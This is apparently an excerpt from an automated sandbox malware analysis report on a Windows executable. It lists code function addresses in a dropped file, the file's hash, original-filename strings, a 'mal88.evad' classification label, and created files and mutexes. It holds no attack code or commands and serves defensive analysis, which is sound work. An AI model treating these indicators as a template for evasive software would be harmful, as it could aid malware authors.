Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004144E114_2_004144E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040E4A114_2_0040E4A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004124B114_2_004124B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041057114_2_00410571
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040E57114_2_0040E571
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042C51114_2_0042C511
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040A52114_2_0040A521
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040C53114_2_0040C531
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040A5C114_2_0040A5C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040E64114_2_0040E641
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044061114_2_00440611
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041062114_2_00410621
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040C63114_2_0040C631
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042C6C114_2_0042C6C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004106D114_2_004106D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040C6D114_2_0040C6D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040A6B114_2_0040A6B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040A77114_2_0040A771
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044070114_2_00440701
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040E71114_2_0040E711
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004327C114_2_004327C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042C78114_2_0042C781
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004127A114_2_004127A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004107A114_2_004107A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044081114_2_00440811
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040C82114_2_0040C821
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040A82114_2_0040A821
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040A8C114_2_0040A8C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042C8D114_2_0042C8D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040E95114_2_0040E951
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044095114_2_00440951
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040A96114_2_0040A961
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040C97114_2_0040C971
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042C9D114_2_0042C9D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004109F114_2_004109F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041299114_2_00412991
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00408A4114_2_00408A41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040AA7114_2_0040AA71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040EA1114_2_0040EA11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040CA3114_2_0040CA31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040CAF114_2_0040CAF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042CAA114_2_0042CAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00410AB114_2_00410AB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00412AB114_2_00412AB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042CB4114_2_0042CB41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00432B5114_2_00432B51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040AB6114_2_0040AB61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00408B0114_2_00408B01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040EB0114_2_0040EB01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040EBC114_2_0040EBC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00408BC114_2_00408BC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040CBF114_2_0040CBF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00412B8114_2_00412B81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00410B9114_2_00410B91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00412C5114_2_00412C51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040AC6114_2_0040AC61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00408CE114_2_00408CE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040CD4114_2_0040CD41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040AD5114_2_0040AD51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00414D6114_2_00414D61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042CD6114_2_0042CD61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00408D7114_2_00408D71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00410D1114_2_00410D11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040ED3114_2_0040ED31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040EDD114_2_0040EDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040EE7114_2_0040EE71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040AE1114_2_0040AE11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00408E1114_2_00408E11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040CE3114_2_0040CE31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00410EA114_2_00410EA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00410F4114_2_00410F41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040EF5114_2_0040EF51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040AF5114_2_0040AF51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00408F1114_2_00408F11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040CF3114_2_0040CF31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042CFE114_2_0042CFE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040CFF114_2_0040CFF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040F05114_2_0040F051
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041107114_2_00411071
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040900114_2_00409001
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040B03114_2_0040B031
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040B0D114_2_0040B0D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004090E114_2_004090E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040D09114_2_0040D091
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041114114_2_00411141
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042D17114_2_0042D171
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043F11114_2_0043F111
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040F12114_2_0040F121
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044313114_2_00443131
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040F1D114_2_0040F1D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004431D114_2_004431D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042B1E114_2_0042B1E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040918114_2_00409181
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040D25114_2_0040D251
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041123114_2_00411231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040923114_2_00409231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040F2C114_2_0040F2C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004112D114_2_004112D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040B2E114_2_0040B2E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044329114_2_00443291
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040935114_2_00409351
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044336114_2_00443361
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040B37114_2_0040B371
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040D30114_2_0040D301
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043F31114_2_0043F311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042B32114_2_0042B321
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042D3C114_2_0042D3C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040D3D114_2_0040D3D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041338114_2_00413381
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040F3B114_2_0040F3B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044343114_2_00443431
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004434F114_2_004434F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043F48114_2_0043F481
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004094A114_2_004094A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040B4A114_2_0040B4A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041356114_2_00413561
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040956114_2_00409561
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040D50114_2_0040D501
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041151114_2_00411511
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040B5E114_2_0040B5E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040F59114_2_0040F591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043F59114_2_0043F591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044359114_2_00443591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040D5B114_2_0040D5B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043F65114_2_0043F651
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044367114_2_00443671
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041360114_2_00413601
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041162114_2_00411621
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040F63114_2_0040F631
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042D6C114_2_0042D6C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040D6E114_2_0040D6E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043F6F114_2_0043F6F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040B68114_2_0040B681
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042B69114_2_0042B691
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004096B114_2_004096B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041174114_2_00411741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040F74114_2_0040F741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044374114_2_00443741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041371114_2_00413711
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040B7C114_2_0040B7C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043F7E114_2_0043F7E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004437E114_2_004437E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040F7F114_2_0040F7F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004097B114_2_004097B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040D80114_2_0040D801
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040F8C114_2_0040F8C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004098D114_2_004098D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043F8D114_2_0043F8D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040B8E114_2_0040B8E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040D8F114_2_0040D8F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042D8F114_2_0042D8F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041188114_2_00411881
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004438A114_2_004438A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041396114_2_00413961
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043F97114_2_0043F971
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004119D114_2_004119D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004139F114_2_004139F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040D9F114_2_0040D9F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004099F114_2_004099F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040F98114_2_0040F981
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044398114_2_00443981
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00411A7114_2_00411A71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040BA0114_2_0040BA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043FA0114_2_0043FA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042DA0114_2_0042DA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042DAC114_2_0042DAC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040BAF114_2_0040BAF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00409A8114_2_00409A81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043FAA114_2_0043FAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042BAA114_2_0042BAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00413B0114_2_00413B01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040DB0114_2_0040DB01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00411B3114_2_00411B31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00411BD114_2_00411BD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040DBD114_2_0040DBD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00413BE114_2_00413BE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040BB8114_2_0040BB81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00409BA114_2_00409BA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042BBB114_2_0042BBB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042BC5114_2_0042BC51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00411C7114_2_00411C71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040BC7114_2_0040BC71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040FC3114_2_0040FC31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00409CC114_2_00409CC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040DC8114_2_0040DC81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043FC9114_2_0043FC91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00413D1114_2_00413D11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040BD1114_2_0040BD11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040DD3114_2_0040DD31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043FD3114_2_0043FD31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040DDD114_2_0040DDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043FDD114_2_0043FDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042BDE114_2_0042BDE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00409DF114_2_00409DF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00403D8114_2_00403D81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00411D9114_2_00411D91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040BDB114_2_0040BDB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043FE6114_2_0043FE61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00411E3114_2_00411E31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042BED114_2_0042BED1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040BE8114_2_0040BE81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040DE8114_2_0040DE81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00447F4F14_2_00447F4F
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040BF7114_2_0040BF71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040DFD114_2_0040DFD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00409FA114_2_00409FA1
Source: Joe Sandbox ViewDropped File: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe 36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
Source: YYjRtxS70h.exe, 00000000.00000000.1485142901.0000000000652000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs YYjRtxS70h.exe
Source: YYjRtxS70h.exeBinary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: classification engineClassification label: mal88.evad.winEXE@21/24@4/5
Source: C:\Users\user\Desktop\YYjRtxS70h.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YYjRtxS70h.exe.logJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
